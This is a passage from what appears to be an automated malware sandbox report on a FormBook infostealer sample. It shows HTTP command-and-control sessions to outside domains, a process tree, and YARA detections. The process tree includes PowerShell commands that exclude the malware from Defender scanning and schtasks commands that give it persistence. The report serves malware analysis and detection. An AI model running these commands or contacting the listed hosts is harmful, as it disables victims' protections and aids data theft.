                                                            Data Ascii: MHJ0GXi=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjeSR/Yi1KNEPUNt58kF2UgzFl/hPyJSvM1JT95xOSNrH+xI9lNzqZsYTP7ZTV7QAVYcccACwjiGph/COAfXPPYGdmerNfR+SuCHKS5e0seNo1BJisV15DJ8MLjk/2wS6rABggh9Hou/47B3/N/YXjDYeIN9PmR03BpkoDbPZ0zFcg3pIrDFZ0UVKo9OEU7MNVxcxCsSPjBLHm8zZ5LKXHJyKVuc1A0nD2GfGQMlccH9m6TtoremMIsObJCiOtX139o3oCReQr1WGJj/eRvAFwKpQZ7A+wCAL39aVgbTPmX24yIGdNXVfG7t7VyaytoAtyJ0OlTe+6H4WwS/l+fI+63oQqa54R4o/eaUFpHhjISYxqNTuSaE8feW6atGCJGIezcQLVGfjMXj7oBL6Kg8f8oWu8o0doCa0OU41w8HXeb6gFHc/ZMgJtCB7KTR2G77CfAPkhTDZq+LqALH7MlP/SbtBugYBhs6Y4JfQGuFqYeKxfyDAfuLUqLffep+bVWiXfkeCGJoEqdu6bVBAYhgEEruXgVh30bGYOVpzvvHOq3bZAcgjI5hYRFn8LK26REjXfatsgAJVFI4jv/k+159POjU4Tgci38aLJJLyqJ5L7LKAX6wXvHwZTvQq1mYe7GnzRzwQpnkiZBcw3DQS7BqBS5Xs1m5r+jGI+mLRwIOHfdKOKEKasclA3gH2qdU8lgC9fa89Qu4Hu/aen7jlNmzthjgWAWIuQ2nfLNIefs1RsvAMEBEgGYQ1/C8pJZkNIfIPEfRBbskh8yYQfSUbkYph7zIXWY72zvDSdiBdwuuRet/B3ovRvee0Fh1lcYch6kcYPcvhBR+TTjhR7hHZ6a5cLIO+WiFydPChFsS09hLSz7ijfKl0M7EZTQie5k1EUh+5/EhSSezOlvXBWSvs4MzImEIHMzTNwkWoiZ96Ce+NQxZXBFlrqVEeokbxcbTU+JQ8r5B [TRUNCATED]
                                                            Jan 11, 2025 04:17:45.866480112 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.74999313.248.169.48806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:47.971817970 CET550OUTGET /rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825 HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:53.430593967 CET401INHTTP/1.1 200 OK
                                                            content-type: text/html
                                                            date: Sat, 11 Jan 2025 03:17:53 GMT
                                                            content-length: 280
                                                            connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 48 49 34 79 3d 55 4c 6b 48 30 32 33 70 2d 32 26 4d 48 4a 30 47 58 69 3d 55 4d 71 64 33 52 72 2f 47 67 6a 63 70 44 74 4d 69 66 46 30 68 41 56 58 55 4c 77 75 67 47 79 61 4a 48 64 66 46 30 76 58 59 78 75 6f 59 38 4e 6d 77 63 52 4b 48 46 52 51 33 5a 63 35 32 32 67 6d 46 57 4c 6d 56 68 70 4f 72 35 46 6c 62 66 6b 72 4f 44 6c 6d 49 2f 46 49 39 6d 4e 42 74 66 55 63 48 73 48 31 42 58 76 48 65 43 38 63 63 4e 4d 54 7a 6a 47 30 38 78 4c 53 44 55 69 57 41 49 67 78 45 30 76 70 46 4d 56 47 61 38 32 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.74999415.197.148.33806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:58.476680040 CET814OUTPOST /zs4o/ HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.duskgazes.work
                                                            Referer: http://www.duskgazes.work/zs4o/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 31 32 61 50 55 74 61 38 66 6a 50 64 44 46 45 6d 58 6c 72 54 2f 68 51 33 43 75 35 52 49 78 71 57 4a 45 33 44 4a 55 49 2b 4e 78 70 30 6c 64 36 4d 58 66 6d 51 38 77 38 71 31 33 56 39 52 72 5a 4a 48 31 70 76 39 50 63 4b 63 4a 75 6a 70 50 64 75 77 63 35 4a 33 54 64 57 49 38 4e 32 31 76 6e 45 62 54 71 67 37 70 55 6c 43 33 68 4e 72 4b 58 4f 30 5a 41 63 32 6f 6c 47 68 6d 6e 6a 4b 53 65 78 74 77 6b 4a 51 52 33 77 53 6b 4a 58 65 70 33 59 51 71 37 55 6a 71 62 30 70 67 55 6e 72 6b 57 43 42 68 74 71 42 64 5a 36 4c 41 38 6d 4f 6c 4a 70 73 39 59 49 36 65 69 33 52 46 6e 44 32 4f 49 31 56 33 7a 6e 62 43 4e 75 39 30 35 43 66 57 50 55 6a 77 3d 3d
                                                            Data Ascii: MHJ0GXi=12aPUta8fjPdDFEmXlrT/hQ3Cu5RIxqWJE3DJUI+Nxp0ld6MXfmQ8w8q13V9RrZJH1pv9PcKcJujpPduwc5J3TdWI8N21vnEbTqg7pUlC3hNrKXO0ZAc2olGhmnjKSextwkJQR3wSkJXep3YQq7Ujqb0pgUnrkWCBhtqBdZ6LA8mOlJps9YI6ei3RFnD2OI1V3znbCNu905CfWPUjw==
                                                            Jan 11, 2025 04:17:58.927802086 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.74999515.197.148.33806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:18:01.027430058 CET834OUTPOST /zs4o/ HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.duskgazes.work
                                                            Referer: http://www.duskgazes.work/zs4o/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 64 30 6b 2f 79 4d 57 65 6d 51 2f 77 38 71 2b 58 56 38 63 4c 5a 43 48 31 74 4a 39 4e 34 4b 63 4a 36 6a 70 4f 74 75 78 76 52 4b 30 6a 64 51 42 63 4e 77 6f 2f 6e 45 62 54 71 67 37 70 42 74 43 78 4a 4e 72 36 6e 4f 6d 74 63 62 6f 34 6c 46 32 57 6e 6a 63 69 65 31 74 77 6b 52 51 54 44 61 53 6e 78 58 65 70 6e 59 52 37 37 54 32 61 62 75 32 77 56 6f 37 58 4c 72 59 41 4e 74 43 76 52 68 46 7a 73 38 50 54 49 4c 32 66 55 6b 6b 50 61 4d 56 48 44 31 68 6f 56 41 58 32 33 2f 57 67 35 50 69 44 63 6f 53 45 75 51 31 4a 6e 31 54 4d 4a 68 4e 67 43 4a 44 41 4d 36 53 4b 33 5a 75 66 34 3d
                                                            Data Ascii: MHJ0GXi=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDd0k/yMWemQ/w8q+XV8cLZCH1tJ9N4KcJ6jpOtuxvRK0jdQBcNwo/nEbTqg7pBtCxJNr6nOmtcbo4lF2Wnjcie1twkRQTDaSnxXepnYR77T2abu2wVo7XLrYANtCvRhFzs8PTIL2fUkkPaMVHD1hoVAX23/Wg5PiDcoSEuQ1Jn1TMJhNgCJDAM6SK3Zuf4=
                                                            Jan 11, 2025 04:18:01.489027977 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.74999615.197.148.33806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:18:03.576286077 CET1847OUTPOST /zs4o/ HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.duskgazes.work
                                                            Referer: http://www.duskgazes.work/zs4o/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 6c 30 6c 4d 71 4d 58 39 2b 51 2b 77 38 71 69 6e 56 35 63 4c 5a 6c 48 31 56 46 39 4e 45 67 63 4b 43 6a 6f 73 6c 75 67 75 52 4b 6a 54 64 51 44 63 4e 78 31 76 6d 47 62 54 36 6b 37 70 52 74 43 78 4a 4e 72 34 50 4f 6c 35 41 62 71 34 6c 47 68 6d 6e 76 4b 53 66 51 74 77 73 42 51 54 48 67 53 58 52 58 65 49 58 59 53 4a 54 54 30 36 62 77 31 77 55 33 37 58 48 77 59 42 68 58 43 75 56 48 46 78 38 38 4f 69 74 50 69 37 41 75 36 2b 75 6c 5a 78 4c 67 72 70 35 54 57 58 58 45 52 41 31 74 72 7a 49 52 4b 55 4b 72 78 75 2f 77 53 61 70 65 4b 79 57 77 49 31 31 56 4f 4b 76 69 30 34 36 44 38 39 59 34 76 56 45 56 52 64 35 4d 55 62 36 42 30 66 58 79 37 6c 5a 6b 66 68 62 6e 56 42 2f 61 68 6a 6d 55 78 67 2f 54 63 5a 4c 55 43 6e 6b 75 33 5a 37 44 5a 52 58 45 2b 6b 73 72 36 32 41 2f 68 4b 57 78 33 52 73 30 41 32 54 5a 4d 75 70 6c 36 6c 49 71 7a 45 44 7a 5a 51 4b 48 7a 71 58 32 72 4d [TRUNCATED]
                                                            Data Ascii: MHJ0GXi=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDl0lMqMX9+Q+w8qinV5cLZlH1VF9NEgcKCjosluguRKjTdQDcNx1vmGbT6k7pRtCxJNr4POl5Abq4lGhmnvKSfQtwsBQTHgSXRXeIXYSJTT06bw1wU37XHwYBhXCuVHFx88OitPi7Au6+ulZxLgrp5TWXXERA1trzIRKUKrxu/wSapeKyWwI11VOKvi046D89Y4vVEVRd5MUb6B0fXy7lZkfhbnVB/ahjmUxg/TcZLUCnku3Z7DZRXE+ksr62A/hKWx3Rs0A2TZMupl6lIqzEDzZQKHzqX2rM0LGLKn12nrHWfAjmII0ij5Acinzww3RbJ9YTIcYxEobSFoKUoDnc/jqt7cJqYX9CL5+k0QGj0Di4Eczs/BrFkVURu8NbHKhi4eSfM7sb1cd+UhGoWsAt4Z8JrcaUif6BWYXGM8ECPQvCwC2XZUE8/cncB8dYt1p9+6GL5FK7p/082+wF70sBsWmjbMnA4+5PABHB2WUzKcqleeJlbE3pb5T7Yrw000gR0E+9SNzTKumtBsLADdwcHkI6mslZNn+MwwIP9/2vhBLIzOnxlYk+Q0AnDnpKdeLoePjF8FCUiYaXiG1uXgWhkVr7Z482dzt+8oi3Iod6vxU2BzEr6xo/uxexA7WEfgJ50b29CLofZUv0ZSs6kui1uCkmb+cGjF9SsdTQE+fZxnOUjP/pzVEGnhCl78/jsl0BTlL9ExA30b8zp6hyXZXJ2Tw358nZhuahurBQ4YXj5h/WTV50t+18TTASDFXCvs89OcYDf5huFNz2WZoFeCGPAzvNWns7XOqBOuHzPIvI61TOglwXRUsxGRJY9U/lzd3TxgaabWqBhLBwMdxw87NCH9yhKYIGtJThyALvng5QNO+VnPc4JG5jhb2qV6a57BqOSEwe9Mli5QMPsGXeQJZlBZSPZUYUNRcrDwq28uMpAY8DSyaL/oX7yQHrDsu16AEqzB [TRUNCATED]
                                                            Jan 11, 2025 04:18:04.955147982 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            20192.168.2.74999715.197.148.3380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:18:06.862514019 CET554OUTGET /zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2 HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:18:07.308546066 CET401INHTTP/1.1 200 OK
                                                            content-type: text/html
                                                            date: Sat, 11 Jan 2025 03:18:07 GMT
                                                            content-length: 280
                                                            connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 48 4a 30 47 58 69 3d 34 30 79 76 58 5a 71 51 58 77 79 4f 46 54 6c 30 64 31 66 78 77 68 51 47 54 73 5a 6a 4b 43 43 33 4a 57 6a 48 4a 45 5a 38 49 42 5a 75 74 4f 2b 59 53 71 76 76 77 69 6f 68 31 52 42 56 52 4b 6c 4d 49 52 56 78 75 63 55 71 45 4d 57 67 72 2b 46 41 67 66 5a 59 72 52 55 72 4e 4d 4e 51 67 49 58 41 4f 67 36 44 78 35 5a 74 4e 6d 5a 33 6c 37 58 73 72 38 49 6c 68 65 68 4d 39 33 4c 4d 63 6c 6d 35 31 77 68 43 62 41 76 55 58 57 56 35 26 6e 48 49 34 79 3d 55 4c 6b 48 30 32 33 70 2d 32 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2"}</script></head></html>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:22:15:59
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\n2pGr8w21V.exe"
                                                            Imagebase:0xa70000
                                                            File size:974'344 bytes
                                                            MD5 hash:8D46BAF183C4F911EA9BF65C8797D8EA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"
                                                            Imagebase:0x830000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"
                                                            Imagebase:0x830000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"
                                                            Imagebase:0x2a0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:22:16:06
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0xa50000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:22:16:09
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff7fb730000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:17
                                                            Start time:22:16:09
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            Imagebase:0xc80000
                                                            File size:974'344 bytes
                                                            MD5 hash:8D46BAF183C4F911EA9BF65C8797D8EA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 68%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:22:16:18
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"
                                                            Imagebase:0x2a0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:22:16:18
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:22:16:18
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x9a0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:23:58:30
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe"
                                                            Imagebase:0x810000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false

                                                            General

                                                            Target ID:23
                                                            Start time:23:58:32
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\systray.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\systray.exe"
                                                            Imagebase:0xcc0000
                                                            File size:9'728 bytes
                                                            MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false

                                                            General

                                                            Target ID:24
                                                            Start time:23:58:44
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe"
                                                            Imagebase:0x810000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false

                                                            General

                                                            Target ID:26
                                                            Start time:23:58:57
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
